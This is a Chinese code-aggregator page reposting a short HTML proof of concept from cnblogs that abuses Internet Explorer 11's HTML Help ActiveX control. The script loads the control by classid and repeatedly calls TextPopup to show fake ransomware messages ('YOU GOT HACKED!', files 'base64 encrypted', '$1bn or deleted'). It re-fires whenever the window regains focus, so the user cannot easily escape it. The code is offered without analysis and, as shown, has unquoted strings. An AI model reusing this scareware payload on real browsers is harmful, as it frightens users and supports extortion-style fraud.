码迷,mamicode.com
首页 > Web开发 > 详细

IE11 HTML Help ActiveX

时间:2016-10-17 11:15:22      阅读:196      评论:0      收藏:0      [点我收藏+]

标签:

<!--by: @qab-->
<OBJECT
id=HHCTRL type="application/x-oleobject"
classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" >
</OBJECT>


<script>
setTimeout(function(){
HHCTRL.TextPopup(YOU GOT HACKED!,"MS Sans Serif, 101, , BOLD",99,99,111,1)//<-- last ints are width,height,textColor,bgColor
},500);
window.onfocus=function(){

setTimeout(function(){
HHCTRL.TextPopup(YOU CANNOT ESCAPE!\nAll your files have been base64 encrypted\n$1bn or deleted!,"MS Sans Serif, 101, , BOLD",199,199,111,1)
},11);
}
</script>

 

IE11 HTML Help ActiveX

标签:

原文地址:http://www.cnblogs.com/sevck/p/5968939.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!